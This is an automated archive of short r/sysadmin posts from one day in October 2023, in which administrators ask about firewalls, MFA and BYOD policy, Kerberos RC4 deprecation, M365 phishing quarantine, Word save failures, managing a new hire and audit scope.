Sysadmin

This is an automated archive.

The original was posted on /r/sysadmin by /u/CertainlyBright on 2023-10-24 21:29:41+00:00.

Going to be buying a PA-1410 and wanted to know what kind of switches do you normally buy with that caliber of firewall?

This is an automated archive.

The original was posted on /r/sysadmin by /u/drmonix on 2023-10-24 21:22:42+00:00.

I'm a linux admin and team of one training a new hire with 20 years of experience, mostly in Devops and AWS. I have about 9. There are other linux admins from other teams I work closely with, but for the most part, myself and this new hire are reponsible for about 600 servers, mostly on-prem and about 1/6 AWS.

Developer reaches out today and wants an web instance accessible off VPN so the client can look at it. I've only been here a year and this is a new one for me, so I go take a look, find the correct security group in about 2 minutes, and decide to offload this to the new hire because PM wants new hire to start getting environment exposure.

I give new hire the task in a group chat with the developer. The new hire asks the developer what the security group and instance are. I reiterate the instance name and tell him the developer doesn't know what security group is needed, to go check and figure it out.

New hire is quiet for about 3 minutes, then asks me to call him. I ask why. He needs help. We screenshare and he pulls up the security groups, but is unable to identify which one. I ask him what he would do if the task were assigned to him and I wasn't here. He says he sees two security groups that seem to allow public internet access but isn't sure which one to use. I ask him what is the best way to decide between the two and he is unsure. I show him that one of the groups isn't actually public internet access and is another group of VPN addresses, and the other group has the rules to allow access from everywhere. He applies it and states that "applying security groups are dangerous and he just wanted a second set of eyes."

This was the situation from today, but this situation has been ongoing. Every task I assign, he troubleshoots for about 2 minutes and then wants the answer handed to him. My PM told me to document these instances, but I feel like I am essentially training someone with double my experience. He obviously knows some of what he is doing, but he is basically nonfunctional without a clearly outlined document giving him a step-by-step instruction on what needs to be done. Our environment isn't well documented for sure, but most of the tasks he seems to have questions on are problems I had to solve myself as a new employee and I did it with relative ease with far less experience.

How do I deal with this guy and stop myself from going insane?

This is an automated archive.

The original was posted on /r/sysadmin by /u/hiddenbutts on 2023-10-24 20:56:41+00:00.

In light of a recent "rant" of questionable truthfulness, it may be time for a discussion on what options we have as sysadmins and why employees don't want to connect personal devices to the company.

This is not a discussion about if MFA should be used or not, it's a discussion about what options are currently available that would satisfy the company's requirement for MFA/security and the employees right to privacy. Looking through the archive, there is nothing recent on this.

Installing an MFA token is not "just an application". It is putting company data on an employee owned device, and the terms of service can change at any time. There are ways you can limit exposure, but in the end, it is making that personal device part of the company assets from a legal point of view.

There are many aspects to this, the biggest of which is legal in nature. Link below is a fantastic overview of the legal landscape involving BYOD and corporate legal issues.

Another aspect to acknowledge is the difference between required and optional. If an employee can opt-in to having email/company data on the phone so it is more convenient for them to work, that is very different than being required to have something on a personal phone to do their job.

There will be people you will run into in your career that have a hard no on mixing personal and work, and that should be respected. Firing someone because they refuse to put work information on a personal device will get you in legal trouble.

So what solutions do you have? Do you have a budget for company cell phones? Do you have yubikeys or similar token generators? Do you have a soft token that is accessible after login to windows? Maybe some other solution?

(not a lawyer, but have been around quite a few blocks and seen some shit. also read the ToS on many of these apps, and they can get updated anytime)

This is an automated archive.

The original was posted on /r/sysadmin by /u/redditor100k on 2023-10-24 20:48:16+00:00.

I was trying to save some money by buying an intel 14700k but it has 8 performance cores and 12 eco cores and microsoft's licensing seems confusing. Are they really going to charge me for the eco cores since I have 20 and the pricing is like 16 or something? I'm pretty confused. It's just me and like 2-3 other people who are going to be remote desktopping into this thing so can I just use the "essentials" version and be done with it? I'm guessing they're not expecting people to use non-xeon CPUs.

This is an automated archive.

The original was posted on /r/sysadmin by /u/Hollowpoint357 on 2023-10-24 20:26:51+00:00.

Can you assign an IP for a collection? I thought maybe I'd be able to use a ptr to point at the hostname for a farm but it was too good to be true. Is this easily doable?

This is an automated archive.

The original was posted on /r/sysadmin by /u/mustang__1 on 2023-10-24 20:00:23+00:00.

Is it possible to configure AOVPN with just a Watchguard VPN server? I don't (presently) have enough licenses to allocate a dedicated windows VPN server. I already have my watchguards running VPN server, can I just use them? Or maybe AOVPN to an Azure gateway that gets piped to HQ? That seems like it would be hideously slow, though...

This is an automated archive.

The original was posted on /r/sysadmin by /u/Seatpan on 2023-10-24 19:37:44+00:00.

While attempting to move from Atlassian Confluence to another tool, we see that there are many features/widgets and other items that don't export properly or at all. With thousands of pages across multiples teams we have only scratched the surface in finding issues. I was wondering if anyone has already gone through this process and has a list of known problems I could add to my list. I'm trying to figure out if we can search the db/html for things that might break. Thanks.

If I should post this question elsewhere, please let me know.

This is an automated archive.

The original was posted on /r/sysadmin by /u/fullMetalFileCabinet on 2023-10-24 19:26:24+00:00.

Think we are getting close to disabling RC4 for Kerberos. A 30 day audit of 4768 and 4769 events shows the following:

AES256-CTS-HMAC-SHA1-96 15,043,147

RC4-HMAC 42

My plan is to define the "Network security: Configure encryption types allowed for Kerberos." in group policy objects that apply to both domain controllers and member servers. Only the following will be checked:

AES128_HMAC_SHA1

AES256_HMAC_SHA1

Future encryption types

My question; after doing this do I still need to identify all accounts that have an SPN defined and check the AES boxes in the account's properties? Does this need to be done on the KRBTGT account as well?

Thanks!

This is an automated archive.

The original was posted on /r/sysadmin by /u/samfisher850 on 2023-10-24 18:34:11+00:00.

I started work at a relatively small but quickly growing company (currently around 200 employees but could probably pass 300 within a couple years) where before me there wasn't really any IT department and software was fully managed by whoever purchased it. For some levels of example, HR owned/managed Google Workspace, our QA lead owns Jira, and marketing owns Adobe CC.

My question is, to what degree should I take ownership of applications as the sysadmin/IT?

My thoughts are

Google Workspace is obvious, I'll take 100% control of that from billing to user accounts.

Jira which is mostly company wide, maybe have an admin account just for deactivating accounts when people leave but let someone else manage the software itself.

Adobe which is mostly used in one department, potentially let them manage everything.

At our size most anything would work decently well, but how should I position everything to accommodate growth to a medium size company?

Edit: formatting Edit2: more specific company size

This is an automated archive.

The original was posted on /r/sysadmin by /u/Cody9412 on 2023-10-24 18:17:39+00:00.

Anybody else seeing ATT issues in the southeast/Florida. It started with screen connect this morning. They say the issue is resolved but I’m still not getting anywhere with it here and I’m seeing reports of routing problems in Florida.

This is an automated archive.

The original was posted on /r/sysadmin by /u/Anxious_Neck7436 on 2023-10-24 16:38:57+00:00.

I started working in an organization this year. It felt new experience to work there as I didn't work in small team environment earlier at workplace. 3-4 seniors were in team, and they micromanaged other members. From the start, environment was like if anyone did mistake it was told to seniormost member. The seniormost member scolded once while coming to office in public and always threatened to move to sysadmin. And finally, he did the same.The work in system admin is like helpdesk only and is not contributing further in my skillset. I just concentrate on day-to-day work and leave on time. I am already in process to upskill in devops profile. Should I leave and upskill full-time if I have emergency fund and I am confident about landing a new job in the same city?

This is an automated archive.

The original was posted on /r/sysadmin by /u/keitheii on 2023-10-24 16:14:37+00:00.

We have multiple buildings around the country, each with multiple carriers in each, and are seeing heavy latency and packet loss when trying to reach certain endpoints and it seems pretty random.

A tracert shows problems in the middle of the route, and even though that hop is within our ISPs infrastructure (AT&T) they refuse to escalate any tickets as our circuits test fine, which they are fine... the issue isn't our circuits, it's the path our traffic is traversing, only for certain endpoints. Unfortunately some of our P2P tunnel endpoints are traversing through these troublesome paths.

I haven't seen any talk of this here today, is anyone else experiencing this?

This is an automated archive.

The original was posted on /r/sysadmin by /u/Max_Xevious on 2023-10-24 15:09:24+00:00.

I really have no idea how I can tell Microsoft any more that emails coming from specific addresses are NOT PHISHING EMAILS!

We use a 3rd party email filtering service and I would honestly prefer to completely disable the anti-phishing through M365 and let our 3rd party handle all of that, but there does not look like a way I can do that.

I have a domain we receive two different emails in the middle of the night to everyone in our office. Its very important info that people need at the very start of the business day. These are two specific email addresses and the domain is the same.

I've gone through and set rules in the EAC to set the SCL to -1 if any email sender matches the two email addresses, but they are still getting flagged as phishing and quarantened.

I've also reported the messages to Microsoft as a false flag but I really have no hope that will help with anything.

The emails in question do have a PDF attachment, but no links or anything in the body of the email.

I am at the end of my rope on this one, I am not sure if there is somewhere else I can set these email addresses to be ignored or if Microsoft just does not care that I whitelisted the email addresses, and even the domain.

This is an automated archive.

The original was posted on /r/sysadmin by /u/Available_Printer on 2023-10-24 16:25:43+00:00.

I’m not asking for help but I wanted to post something because I could not find a single person who had this issue with Sage 2023.

Symptoms: when some databases are opened in Sage, black bars appear over interact-able objects like text fields and drop down menus. It’s more annoying for drop-down lists because each item in the list shows black and you must mouse over each item before it becomes visible. This does not happen on full session RDP, only RemoteApp.

Last year at the end of August there was a Windows patch applied to an AVD server that users login to for Sage. I won’t get I to the specific details because it’s a really long issue.

We contact MS who blamed Sage saying it could not be an OS or Azure issue and likewise Sage blamed MS. This was after exhausting troubleshooting with both vendors.

Today I setup a new AVD (built using the enterprise virtual desktop with Office baked in) and tested with the end user. We have not been able to recreate the issue.

This is an automated archive.

The original was posted on /r/sysadmin by /u/jimboslice_007 on 2023-10-24 15:39:04+00:00.

Small company, currently using google workspace (I know, I know). Looking to add another remote office. The existing remote offices are set up as site-2-site vpns, running hyperv, with a DC and an application server. Ideally, the new office isn't going to need the application server, so it feels like a physical server just for a dc is unnecessary.

What have you guys done for this sort of setup? Get a server anyway? Do some cloud hosted AD solution (dc hosted in aws)? Just use the DC from the main office over VPN?? Seems like there is always something new every couple years and I'm not as current on this stuff as I should be. And as always, there is pressure to keep the cost down.

This is an automated archive.

The original was posted on /r/sysadmin by /u/Confident-Shirt-8467 on 2023-10-24 15:38:26+00:00.

I work in a large corporation. We have around 10 people in our helpdesk 24/7. I find myself constantly getting tickets that are shoved up to Infrastructure for things as simple as “application won’t install, Troubleshooting done: Reboot didn’t fix, assigning to infrastructure for help.”

It’s practically yeeting tickets over because they don’t want to troubleshoot. Just was curious if this is now the standard?

Possibly looking for advice on how to give them more motivation to problem solve? (We pay our helpdesk people nearly $15k above the standard wages for our state)

This is an automated archive.

The original was posted on /r/sysadmin by /u/slewis_1972 on 2023-10-24 15:34:01+00:00.

Ok, seeking sanity and why.

Going through a huge transformation. We have 2500 employees that only access their personal records/HR/training via a specific online systems, dont need email. MFA is being turned on by new vendor - fine by me ( have requested it) especially as some of those users are others managers and have access to multiple accounts in this system. Note, we have scope to goto 4500+ employees in next 2 years.

We are in the UK. So, my question is, SMS for MFA ( but am querying if they are going to do what MS plan to and make it not for primary unless you override ) but also the relevant App from supplier if they wish to install on a phone.

Now, push back from staff to use own devices for MFA. My head is telling me cheapest option is then to use Oath hardware token. £10 a user if that. Or has anyone seen it enforced in a users contract to use own device?

Update: sanity check over, thanks. If they don't agree as simplest solution for them is to use own device, oath hardware tokens it is...

This is an automated archive.

The original was posted on /r/sysadmin by /u/ScuzzyUltrawide on 2023-10-24 15:27:30+00:00.

I haven't done this kind of work in a long time, but back in the day I had utilities to do this. Today I would have to look up a bunch of individual utilities to do things like dump out the active process list, drive list with capacity and usage, installed apps according to os level utilities. It had a piece for windows and for linux and would dump out big text files that we used for getting the post-migration systems back up and running correctly. I'm being pulled in because I'm a developer in a legacy language and someone quit and I stepped up, but now I kind of wish I had my old tools like from the Win2000 era. Now I have a list of about 15 legacy windows and linux servers I need to get my arms around. Anyone have a couple links to help me out? I'm at a loss for search terms. What is that class of software even called now?

This is an automated archive.

The original was posted on /r/sysadmin by /u/rmeman on 2023-10-24 15:23:53+00:00.

Hello,

anyone else aware of network issues from NA to South/Central America ? We're getting reports from all over the place from Brazil, Peru, Colombia, Chile, Costa Rica, etc

This is an automated archive.

The original was posted on /r/sysadmin by /u/TechnicallyBasedCat on 2023-10-24 15:15:25+00:00.

Hey everyone!

I have a really strange issue that I have been struggling to find a root cause for, and I was wondering if anyone else here has run into something similar or has some advice on what I could check/try next.

Problem: Several users in a small office work out of a single network share, primarily on Word (docx) documents. In the last couple of weeks, they noticed that every ~10-15 documents, they interact with one that has this strange behavior when trying to save it. Basically, when you hit the save icon, Word acts like it saves the document with no errors, nothing. But the file never gets updated in the file share.

Some other points to note:

• The documents were all created by these employees and not generated by any system or online tool.
• If you do a "save as" on the problem documents and create a new copy, the issue does not follow to the new document.
• If another user tries to open and save the problem document, they will have the same issue.
• All of the documents are in the same format (docx).
• There is nothing visibly special about these documents: no pictures, no hyperlinks, just straight text.
• All of them are running Office 2309 Build 16827.20130 - Current Channel.
• We have tried running a full online repair of Office.
• The behavior is the same whether or not the user has multiple documents open at the same time or just the problem document.
• Documents that were previously causing an issue seemingly no longer have the issue after a couple of days.
• Saving the document locally works without issue.
• OneDrive is enabled and syncing OK, but they do not use the "Auto Save" feature as these files are on a network share.
• We are running ESET and Huntress on their workstations and file server and neither have any related alerts or log entries.

This is the first time I have seen anything like this. Very strange behavior from Word.

Would appreciate any advice you can pass along for what to try next.

Thanks!

This is an automated archive.

The original was posted on /r/sysadmin by /u/shalnark90 on 2023-10-24 15:09:02+00:00.

I work in an organization that disabled powershell for everyone even admins . The security team mentioned that its due to " powershell being a security issue" . Its extremely hard doing the job without powershell. In trying to convince them that this isnt the way but the keep insisting that every other organization does the same thing. What do y'all think?

This is an automated archive.

The original was posted on /r/sysadmin by /u/imrik_of_caledor on 2023-10-24 15:01:20+00:00.

Rational or not, what are the products, brands etc do you just dislike or not trust.

Mine is Dell VXrail - we had one at my last place and spent a lot of money on consultancy (Our CTO evidently had a golf buddy at consultancy place) and professional services getting it in.

The thing itself was fine but we were not fans of the vSAN - we did some resiliency tests one weekend in our datacentre before it went live and had to power everything off...the vSAN practically shat itself, to the point where we were very sceptical of the resiliency it offered vs a traditional SAN.

This is an automated archive.

The original was posted on /r/sysadmin by /u/dogcmp6 on 2023-10-24 14:41:10+00:00.

I have been having issues with HP Managed Print services sending out supply requests in a timely manner. I have 4 supply requests open for a month, and the ink was never shipped, I had the same issue with another printer last month, and it sounds like other buildings within my org have been having similar issues...Was curious if any other Sysadmins are running into this issue? HP support reps keep running us in circles...It's somehow worse than talking to Comcast.

This is an automated archive.

The original was posted on /r/sysadmin by /u/PowerShellGenius on 2023-10-24 14:25:00+00:00.

I'm seeing a Google Workspace for Education Fundamentals tenant that isn't letting newly created users into their accounts without adding and verifying a phone number. 2-step verification is not enforced in the tenant.

Obviously, it's not a foregone conclusion in K12 that all users even own a cell phone yet. I'm assuming there is a way to shut this off entirely, but I'm not seeing it.

This is an automated archive.

The original was posted on /r/sysadmin by /u/TypaLika on 2023-10-24 14:09:33+00:00.

Currently going through an internal audit for security in preparation for a common certification. We have provided the internal auditor with the CUECs for our SaaS subscriptions, and they are following up for items related to products we don't subscribe to. When I try to explain this, I get lectures about never telling an auditor no followed by long-winded diatribes about how important this process is.

If I have a documented vehicle maintenance schedule and I use a fleet maintenance manual from the manufacturer as guidance, I'm not going to maintain schedules, perform tasks, and have documented procedures for models that are in the manufacturer's manual but not in my fleet. I'm absolutely certain I'm right, and I'm not going to back down and write procedures for SaaS applications we don't subscribe to because if I do I'll pay for that acquiescence multiple times a year in multiple inane and frustrating pointless audits. To be clear, I'm not saying audits are pointless, but audits for maintenance and security of cloud applications we don't have subscriptions for is pointless.

Is there a better analogy than my car analogy? Is there some defense for this inanity? Am I missing something, or do I just need a lobotomy to stay in this field?